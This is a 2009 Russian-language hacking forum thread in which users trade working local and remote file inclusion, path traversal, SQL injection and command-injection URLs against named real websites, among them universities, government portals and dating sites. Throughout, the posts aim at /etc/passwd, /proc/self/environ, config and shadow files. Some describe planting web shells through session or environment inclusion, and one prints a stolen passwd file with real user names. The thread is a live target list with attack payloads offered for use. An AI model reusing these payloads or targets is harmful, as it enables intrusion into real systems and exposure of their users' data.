http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../proc/self/environ&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/ssh/sshd_config&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/php.ini&lang=german&source=index&title=Netboot-Spezifikation
http://netboot.sourceforge.net/cgi-bin/getdoc.cgi?doc=../../../../../../../../etc/my.cnf&lang=german&source=index&title=Netboot-Spezifikation
-----------------------------
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/passwd%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../proc/self/environ%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/ssh/sshd_config%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/httpd/conf/httpd.conf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/php.ini%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../etc/my.cnf%00
http://perl-win32-gui.sourceforge.net/cgi-bin/docs.cgi?doc=../../../../../../../../../var/log/maillog%00
-----------------------------
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/passwd%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../proc/self/environ%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/httpd/conf/httpd.conf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/php.ini%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/my.cnf%00
http://www.carechannel.de/cgi/nm/nm.cgi?doc=../../../../../../../../etc/logrotate.d/vsftpd.log%00
-----------------------------
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../etc/passwd
http://www.bailii.org/cgi-bin/markup.cgi?doc=../../../../../proc/self/environ

RulleR
06.07.2009, 23:43
[PR 6]
http://web.ce.metu.edu.tr/index.php?id=../../../index
[PR 6]
http://www.ipp.mesi.ru/edu/index.php?id=index

Fata1ex
08.07.2009, 21:44
http://www.motormania.hr/index.php?forwardUrl=../../../../../etc/passwd
:(

Ctacok
09.07.2009, 23:59
http://www.jlc-software.com/?page=../../../../etc/passwd
:)
Safe mode :(

schwarze
11.07.2009, 20:08
http://www.mumost.cz/informace/index.htm?fr2=../../../ и тд и тп)

RulleR
12.07.2009, 23:54
[PR 6]
http://www.piedmont.edu/index.php?id=../index.php%00

Pashkela
17.07.2009, 23:06
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/passwd%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/ssh/sshd_config%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../etc/httpd.conf%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00
http://www.townofmamaroneck.org/cms/view.cgi?file=../../../../../../../../../../../../var/log/maillog%00

-----------------------------
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/passwd%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/php.ini%00
http://www.gazovik.tyumen.ru/cgi-bin/view.cgi?file=../../../../../../../../../../../etc/my.cnf%00


-----------------------------
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/passwd%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../etc/ssh/sshd_config%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../var/log/xferlog%00
http://mall.usashopper.com/view.cgi?file=../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/%00


-----------------------------
http://www.biblestudytools.com/History/AD/EarlyChurchFathers/Ante-Nicene/Origen/view.cgi?file=../../../../../../../../../../../../../../etc/passwd

Pashkela
18.07.2009, 02:25
http://www.embavenez-us.org/index.php/function.include?pagina=../../../../../../../../../../../../../../etc/passwd

----------------------------- fuck owner:)
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd - тут грязно ругается почему-то
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/passwd%00
http://annamusic.ru/index.php?inc=../../../../../../../../../../../../../../etc/ssh/sshd_config%00

_>SubDeviL<_
18.07.2009, 23:41
http://dtv.horizont.by/index.php?id=../../../../../../etc/passwd

вродь немало там хостится..

ph1l1ster
23.07.2009, 19:46
http://www.spaziopetardo.it/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.classicbattletech.com/index.php?action=../../../../../../../../../../../../../etc/passwd%00
http://highwaycompanions.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.velvetrevolver.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://www.everestkc.net/index.php?module=../../../../../../../../../../../../../etc/passwd%00

ph1l1ster
23.07.2009, 21:48
Ещё партеечка ;)

http://www.cityteam.org/news/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.santana-aschaffenburg.de/index.php?c=../../../../../../../../../../../../../etc/passwd%00
http://www.tanzi.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://wiki.colortent.com/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://ja7nwi.ddo.jp/passwiki/passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
http://www.savvycircle.com/page.php?page=../../../../../../../../../../../../../etc/passwd%00
http://www.oralabs.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://rubistar.4teachers.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
http://hibbingcurling.com/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://accessnorth.net/letterit2/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.accessnorth.net/letterit/inc/wysiwyg.php?language=../../../../../../../../../../../../../etc/passwd%00
http://www.hamptonct.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.barapp.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.ninabonos.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.taylortaylorlondon.com/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.math.umd.edu/~dcarrera/bsm/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.carey.wa.edu.au/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://remerge.sourceforge.net/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://melissaphillippe.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.monkeyircd.org/cgi-bin/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://nakabayashi-kensetsu.co.jp/recruit/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.solumandherbe.com/index.cgi/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://careers.eaglesold.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.californiafleurish.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://ultrateq-digital.co.uk/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://www.studionouveau.com/index.cgi?page=../../../../../../../../../../../../../etc/passwd%00
http://freeresalerights.lescigales.org/?page=../../../../../../../../../../../../../etc/passwd%00qwe123


антибоян - google

ilinsky
24.07.2009, 12:04
Директория

http://doska42.ru/index.php?rub=news&page=../../../../../../../etc/

Файл в ней

http://doska42.ru/index.php?rub=newspod&rubnews=../../../../../../../../../..&page=FILENAME

ph1l1ster
28.07.2009, 23:07
Банка,
multibanka.com

Берёт файл, например:

http://www.multibanka.com/get_file.php?ext=pdf&q=c3VyL25vaXRhY2lscHBhL3N0bmVtdWNvZC9zZWxpZl9kZWRh b2xwdT1odGFwX2VsaWY7ZmRwLnVyXzcwMDJfc3Rza2FyYXNfdX RzbGF2XzI9ZW1hbl9lbGlm

Base64!
Декодируем:

sur/noitacilppa/stnemucod/selif_dedaolpu=htap_elif;fdp.ur_7002_stskaras_utsl av_2=eman_elif

^_^

file_name=2_valstu_saraksts_2007_ru.pdf;file_path= rus/application/documents/selif_dedaopu

Делаем по умному /etc/passwd

/cte/=htap_elif;dwssap=eman_elif

И берём его :)

http://www.multibanka.com/get_file.php?ext=pdf&q=L2N0ZS89aHRhcF9lbGlmO2R3c3NhcD1lbWFuX2VsaWY=

такая вот шн*га.

P.S:

get_file.php



include "include_php/my_encoder.php";


decode_str( $_GET['q'] );
$file_type = explode('.',$_GET['file_name']);
$file_type = end($file_type);
if(strtolower($file_type)=='pdf')
header('Content-type: application/pdf');

//print_r($_GET);
header("Content-Description: File Transfer");
header("Content-Disposition: attachment; filename=". $_GET['file_name']);
header("Content-Transfer-Encoding: binary");
header("Content-Type: application/download");
header("Accept-Ranges: bytes");
header("Content-Length: ". filesize($_GET['file_path']."/".$_GET['file_name']));



$file = $_GET['file_path']."/".$_GET['file_name'];
$filename = fopen($file,"r");
$data = fread($filename, filesize($file));
fclose($filename);

echo $data;



my_encoder.php



function encode_str($string) {
return base64_encode(strrev($string));
}


function decode_str($string) {
$result = strrev(base64_decode($string));

// SQL injection tests

if ((eregi("SELECT", $s)) || (eregi("select", $result)) || (eregi("UNION", $result)) || (eregi("union", $result))) {
Header("Location: http://www.bs.lv/track_hacker.php");
}

$tmp_arr=split(";",$result);

for ( $i=0; $i<=sizeof($tmp_arr); $i++ ) {
$ta = split("=",$tmp_arr[$i]);

if ($ta['0']) {
$_GET[$ta['0']] = $ta['1'];
}
}

}

ph1l1ster
29.07.2009, 14:04
http://www.lastminute-music.com/index.php?inc=/etc/passwd


http://www.pubs.org.au/index.php?inc=/etc/passwd

mailbrush
03.08.2009, 12:32
тИЦ: 50
PR: 4

RFI
http://www.bloodfmba.ru/news/mir.php?id=RFI

Ctacok
05.08.2009, 17:29
http://www.centerforloss.com/articles.php?file=
Локальный инклюд.
До /etc/passwd несмог пробраться, на хостинге фильтр.


http://www.matchmaking.at/athen2008/index.php?file=

локальный инклюд.
что то ненашёл /etc/passwd

http://www.westbalkanresearch.net/index.php?file=

Такая же беда :(

mailbrush
06.08.2009, 09:51
PR4

LFI

http://www.akademiaurody.com/index.php?id=[LFI]

FireFenix
07.08.2009, 12:57
LFI

тИЦ 240
PR 5/10
http://www.tnpu.edu.ua/php1/index.php?page=../../../../../../etc/passwd

FireFenix
07.08.2009, 15:00
На форуме нашёл тока sql-inj к сайту, поэтому выложу php-inj

LFI
http://www.uvm.edu/student_life/?Page=../phpinfo.php

satana-fu
07.08.2009, 16:27
ну и от меня кусочек

http://www.lauralee.com/index.cgi?page=../../../../../../../etc/passwd%00
http://www.cats-online.ru/index.cgi?state=article_phsycology&page=../../../../../../../etc/passwd%00
http://www.phathack.com/index.cgi?page=../../../../../../../../../../../../../../etc/passwd%00
http://www.concordalliance.org/index.cgi?page=../../../../../../../../../../../../../../../../../../etc/passwd%00

+++AndreyDevil+++
08.08.2009, 02:17
http://www.menlo.edu/library/courses/courses.php?course=../../../../../../etc/passwd

mailbrush
13.08.2009, 17:26
http://www.halalapalooza.com/d.php?id=[LFI]

pi7dets
14.08.2009, 16:08
http://www.ksu.ru/f9/k2/new/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00 PR7, тИЦ 2100

BHYCHIK
15.08.2009, 18:43
Пхп-инъекция на сайте aphorism-list.com с возможностью залить шелл.

http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd%00
http://aphorism-list.com/frasy.php?page=../../../../../../../../../../../../../../../../../../../proc/self/environ%00

Шел без проблем льется при подмене user-agent и инклудом /proc/self/environ (кто читал последнего хакера точно поймет)

Кстати, на хостинге лежит дистрибутив windows xp sp3)

И еще, подскажите, почему не всегда можно заинклудить /proc/self/environ (естественно системы никсовые)? Прав не хватает?

geezer.code
15.08.2009, 22:37
http://www.leonardo-co.com/index.php?folder=Career&page=../../../../../../../../../../etc/passwd
http://www.bonnarealty.com/home.php?inc=../../../../../../../../etc/passwd

BHYCHIK
16.08.2009, 16:15
http://www.tallinnamerepaevad.ee/est.php?page=../../../../../../../../../../etc/passwd%00

mailbrush
16.08.2009, 20:28
http://stanleycup.crash.sk/sc.php?id=[LFI]
http://www.dalcomstechnologies.com/pricing.php?id=[LFI]

BHYCHIK
17.08.2009, 14:22
http://www.pillows.jp/20th/p/index.php?page=../../../../../../../../../../../../etc/passwd%00

BHYCHIK
18.08.2009, 00:43
Инъекции на 2ух японских сайтах

http://www.holos.jp/index.php?page=../../../../../../../../../../../../../../../../../../../../../../etc/group

http://mobasp.jp/page.php?cat=../../../../../../../../../../../../../../../../../../../../etc/passwd

5rap
19.08.2009, 12:09
Опять решил полазить поискать php inj:

http://www.fitnessmanager.ru/index.php?page=../../../../../../../etc/passwd

RulleR
20.08.2009, 14:41
http://www.handballneuchatel.ch/httpdocs/index.php?inc=../../../etc/passwd%00
http://www.robotsandbotanics.de/index.php?inc=../../../../../../../../etc/passwd%00
http://www.tasteone-medientechnik.de/index.php?inc=../../../../../../../etc/passwd%00
http://www.haldergmbh.de/index.php?inc=/etc/passwd
http://blesk.issa.cz/index.php?inc=index.php%00

dr.Web
20.08.2009, 22:13
http://wow.crpg.ru/modules.php?op=modload&name=..&file=index
просмотр файлов

monolog
20.08.2009, 23:23
http://iea.uoregon.edu/page.php?query=static&file=/../../../../../../../../../../../../../etc/passwd
http://occs.odu.edu/page.php?page=news_security/../../../../../../../../../../../../../../../../../../../../etc/passwd
http://languagesupport.msu.edu/page.php?toggle=5&id=SectionProfDev/../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

HAXTA4OK
23.08.2009, 11:08
http://www.lambproject.org/content.php?tt=../../../../../../etc/passwd&pc1=&pc2=spacer&pc3=spacer&origin=

Fuckel
23.08.2009, 23:51
http://www.veye.com.ua/doc.php?d=../

RulleR
24.08.2009, 11:15
http://www.emini-collection.ch/index.php?file=../../../../etc/passwd%00
http://www.jolly-dent.de/index.php?file=/etc/passwd%00
http://www.e-medica.jp/index.php?file=../../../../../etc/passwd%00

HAXTA4OK
24.08.2009, 15:06
http://www.eximoforta.ru/index.php?file=index.php цикл index.php

Joker-jar
28.08.2009, 19:59
http://www.ruspi.ru./?page=[local]

z00MAN
28.08.2009, 23:58
http://www.ie.rmutk.ac.th/index.php?file=../../../../../../../etc/passwd

http://www.cdu-rhauderfehn.de/index.php?folder=pages&file=../../../../../../../etc/passwd

Swift
29.08.2009, 19:01
http://yuanpei.pku.edu.cn/old/index.php?option=com_content&task=view&id=[RFI]

ph1l1ster
30.08.2009, 19:20
http://www.tzimakos.gr/print.php?id=/proc/self/environ

http://my.getmorediamonds.com/getstarted.php?id=index.php&url=../../../../../../etc/passwd

http://www.joeplecker.com/display.php?id=/proc/self/environ

http://petercottontailpreschool.com/index.php?id=/etc/passwd

edge911
30.08.2009, 22:46
http://pvp-game.ru/index.php?act=../index цикл index.php

ph1l1ster
07.09.2009, 20:16
Думаю лучше к php иньекции отнести..хотя гугл говорит как sql иньекцию дак боян, но всё равно баг в другом скрипте!)

Интересная скуля, берёт имя файла из БД и даёт его на загрузку. (Я лично первый раз такое встречаю)

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+version()--

Идёт файл на загрузку, в имени файла вывод:

5.0.51a-3ubuntu5.4

подставим своё значение:
magic qutes = on, поэжтому захексим

http://www.ces.fau.edu/OWLS08/presentations/presentations.php?id=-24+union+select+0x2f6574632f706173737764--

И скачиваем /etc/passwd :)

presentations.php


error_reporting(0);
mysql_connect("localhost","*","*");
mysql_select_db( "owls08" );
error_reporting(1);

$id = mysql_real_escape_string( $_REQUEST['id'] );

$query="SELECT file from presentations where id=$id";
$result = mysql_query( $query ) or die( mysql_error() );
$row = mysql_fetch_array( $result );

$file = $row['file'];

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($file));
header( "Content-Description: File Transfer");
@readfile($file);

Tigger
13.09.2009, 04:16
http://piecero.awardspace.us/index.php?page=../../../../../../../../../../../etc/passwd
http://www.mvhs.sad3.k12.me.us/sad3/mves/site.php?page=../../../../../../../../../../../etc/passwd

wildshaman
13.09.2009, 10:42
http://www.duma.gov.ru/index.jsp?t=./index.jsp

DFrost
13.09.2009, 13:46
http://www.summerschoolalpbach.at/index.php?file=index.php
http://www.b2match.com/watervienna09/index.php?file=index.php
http://www.autoday2009.sk/index.php?file=../../../../../../../../../../../etc/passwd

Tigger
15.09.2009, 00:29
http://sdm.mit.edu/index.php?fileName=index.php

Calcutta
16.09.2009, 21:13
http://stroycement.ru/stat.php?p=../../../../etc/passwd

HAXTA4OK
19.09.2009, 10:09
http://dnfo.ru/page.php?p=../page
http://www.kamp.ru/page.php?p=page&board=1

DFrost
19.09.2009, 19:05
European investment banking firm
http://www.druekerco.com/index.php?folder=Career&page=../../../../../../etc/hosts.lpd

DeepBlue7
26.09.2009, 00:45
http://eminima.org/safepup/index.php?file=../../../../../../../../../../../etc/passwd

HAXTA4OK
26.09.2009, 09:34
http://www.gnpbu.ru/index.php?file=../index.php
http://wnr.economicus.ru/index.php?file=../index
http://www.eximoforta.ru/index.php?file=index.php

www.oUNIX.ru - о UNIX-системах.

http://www.ounix.ru/index.php?page=../admin/index&id=8

la2
http://la2rasta.ru/index.php?f=index

DeepBlue7
27.09.2009, 02:58
http://www.physics.carleton.ca/atlas/index.php?file=../../../../../../../../../../../etc/passwd

http://www.abei.it/index.php?file=../../../../../../../../../../../etc/passwd&sezione=Convegno%20Nazionale%202008&menu=Programma

http://www.enterprise-europe-network.ch/marketplace/index.php?file=../../../../../../../../../../../etc/passwd

HAXTA4OK
27.09.2009, 10:36
http://mypara.ru/index.php?page=index
http://www.autodafe.ru/index.php?page=../index

попугай
29.09.2009, 11:59
http://wework.philaforum.com/index.php?site=http://google.com/search?q=

Pashkela
04.10.2009, 18:04
http://www.ruvr.ru/index.php?lng=../../../../../../../../../../../../../../etc/passwd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

nikp
07.10.2009, 21:02
http://www.myperfecthalf.com/forum/topic.php?topic_id=364&language_id=../../../../../../etc/passwd%00

nikp
07.10.2009, 22:53
http://www.myperfecthalf.com/member/toprated_list.php?view_mode=gallery&language_id=../../../../../../etc/passwd%00&page=32&command=online
http://kneuro.net/littlesite/index.php?file=/etc/passwd

SeNaP
08.10.2009, 12:02
http://www.prodisney.ru/index.php?page=index.php

nikp
08.10.2009, 12:17
http://www.automoto66.ru/index.php?state=other&file=../../../../../../etc/passwd&page=2
http://www.mainechiropractic.org/index.php?file=/etc/passwd%00

hackmon
08.10.2009, 16:01
http://www.sports-emotions.ch/index.php?cat=../../../../../../etc/passwd%00

0nep@t0p
09.10.2009, 11:50
http://www.villaaqva.com/index.php?page=../../../../../../../proc/self/fd/2%00

hackmon
09.10.2009, 13:27
http://www.angel-bal.ru/?flash=0&pg=text.php&path=../../../../../../../../../../../etc/passwd

0nep@t0p
11.10.2009, 00:45
http://www.menopausethemusical.com/main.php?page=../../../../../../../proc/self/fd/2%00&getshow=210

hackmon
11.10.2009, 23:05
http://rgsu.by/index.php?cat=../../../../boot.ini%00/*

nikp
12.10.2009, 00:22
http://www.dateautismsingles.com/member/sign_in.php?language_id=../../../../../../etc/passwd%00

http://realasianlove.com/faq.php?language_id=../../../../../../../../etc/passwd%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/environ%00
http://realasianlove.com/faq.php?language_id=../../../../../../../../proc/self/fd/2%00

http://rsvpsinglelife.com/member/links_directory.php?language_id=../../../../../../etc/passwd%00
http://rsvpsinglelife.com/phpinfo.php

nikp
13.10.2009, 01:16
http://www.mingleifsingle.com/about.php?language_id=../../../../../../etc/passwd%00
http://www.mingleifsingle.com/about.php?language_id=../../../../../..//home/mingleif/etc/mingleifsingle.com/shadow%00

http://www.futbolcontactos.com/forum/forum.php?language_id=../../../../../../etc/passwd%00

[x60]unu
13.10.2009, 01:37
http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../etc/passwd%00
http://lesnoyexpert.spb.ru/index.php?p=about&id=../../../../proc/self/fd/2%00

Phen1x
13.10.2009, 14:14
http://umadevi-artgallery.com/?file=/home/umadevia/public_html/_vti_pvt/service.pwd&flashContent=c2

nikp
14.10.2009, 01:11
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../etc/passwd%00
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../proc/self/fd/2%00

Cтоит движок производства "SkaDate social networking software"
Лить шелл удобно через сессию, смотрим куки, ищем сессию
http://www.zenith-france.com/dating/privacy.php?language_id=../../../../../../../../../tmp/sess_ee1f74898b80f31c2848a56c24b0048a%00

аналогичная история
http://www.swingland.dk/member/join.php?language_id=../../../../../../../../etc/passwd%00

на хостинге aston.skadate.com
http://www.citasrapidas.com.mx/member/join.php?language_id=../../../../../../etc/passwd%00
http://www.cosmicties.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.duhlan.com/top_rated_photos.php?language_id=../../../../../../etc/passwd%00
http://www.exoticity.net/member/media_view.php?language_id=../../../../../../etc/passwd%00
http://www.myflingdate.com/member/featured_list.php?language_id=../../../../../../etc/passwd%00
http://www.rightmate.net/forum/topic.php?topic_id=6&language_id=../../../../../../etc/passwd%00
http://www.sawasdeeka.com.au/faq.php?language_id=../../../../../../etc/passwd%00
http://www.swinging4pleasure.com/contact.php?language_id=../../../../../../etc/passwd%00

nemaniak
16.10.2009, 20:26
sosolid2k.co.uk

http://www.sosolid2k.co.uk/site.php?page=../../../../../../../../etc/passwd

а также

http://www.sosolid2k.co.uk/guides/monsters/monster-guide.php?
monster=../../../../../../../../etc/passwd

conservatoryoutlet.co.uk

http://conservatoryoutlet.co.uk/shop.cgi?page=../../../../../../../etc/passwd

SeNaP
19.10.2009, 18:48
http://www.rounder.com/index.php?id=index.php&newsId=973



http://www.mvizru.ru/index.php?id=index.php



http://www.keller.com.ua/index.php?id=index.php

http://www.electrolatrine.net/uk/index.php?page=index.php
http://www.roleplay2.com/index.php?page=index.php

http://blangkonet.co.cc/index.php?page=index.php

http://voice-sms.net/index.php?page=index.php

Ctacok
20.10.2009, 18:40
http://www.je.au.com/common/file.php?file=../../../../../../../../etc/passwd

Как бэ качалка.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
accassar:x:1000:1000:,,,:/home/accassar:/bin/bash
spong:x:102:65534::/var/lib/spong/tmp:/bin/false
automation:x:1003:50:,,,:/usr/local/automation:/bin/false
postfix:x:103:101::/var/spool/postfix:/bin/false
nagios:x:104:104::/var/log/nagios:/bin/false
Debian-exim:x:107:107::/var/spool/exim4:/bin/false
dmargas:x:1005:1005:Dariusz Margas,,,:/home/dmargas:/bin/bash
cchen:x:1001:1001:,,,:/home/cchen:/bin/bash
csmall:x:1002:1002:,,,:/home/csmall:/bin/bash
statd:x:101:65534::/var/lib/nfs:/bin/false
snmp:x:105:65534::/var/lib/snmp:/bin/false
oident:x:106:108::/:/bin/false
ntp:x:109:109::/home/ntp:/bin/false
cgregg:x:1006:1003:,,,:/home/cgregg:/bin/bash
libuuid:x:110:201::/var/lib/libuuid:/bin/sh
jmullins:x:1004:1004:,,,:/home/jmullins:/bin/bash

nikp
20.10.2009, 21:30
http://www.anat.stonybrook.edu/IDPAS/index.php?page=../../../../../../../../etc/passwd%00

http://www.speakmania.com/index.php?language_id=../../../../../../../../etc/passwd%00

Ctacok
21.10.2009, 07:42
http://www.kristinalucas.com/img.php?id=2/../../index.html%00&pf=1

http://www.prezident.md/const.php?lang=anti - кто сможет раскрутить +5.

Gray_Wolf
22.10.2009, 10:49
http://www.sarznak.ru/forum/forumdisplay.php?fid=2&sortby=%27];system%28%27cat%20/etc/passwd%27%29;exit;//

nikp
22.10.2009, 20:52
http://hiphopgame.ihiphop.com/index2.php3?page=../../../../../../../../etc/passwd%00

http://www.warnerfamilychiropractic.com/index.php?file=../../../../../../../../../etc/passwd%00

Ctacok
23.10.2009, 18:49
http://www.heitmannplus.no/litteratur/index_artikkel.php4?nyhetsoverskrift=Grunnleggende %20antagelser%20for%20et%20nytt%20%E5rhundre&artikkel_id=../../../../../../../../../../../../../etc/passwd

nikp
25.10.2009, 21:04
http://adirondackchiropractic.com/index.php?file=../../../../../../../../etc/passwd%00&documentName=ywtl
без socks не пускает, м.б. страна не нравится или обнаруживает прокси

http://www.termassaojoao.com.br/index.php?conteudo=/etc/passwd

Ctacok
25.10.2009, 21:28
http://www.metaltotal.ru/index.php?file=index.php

mailbrush
28.10.2009, 17:35
http://www.bsgpilots.com/Themes/XD-Reborn/index.template.php?cmd=ls
Не совсем по теме, но всё же...
ЗЫ: Шелл льётся без проблем :)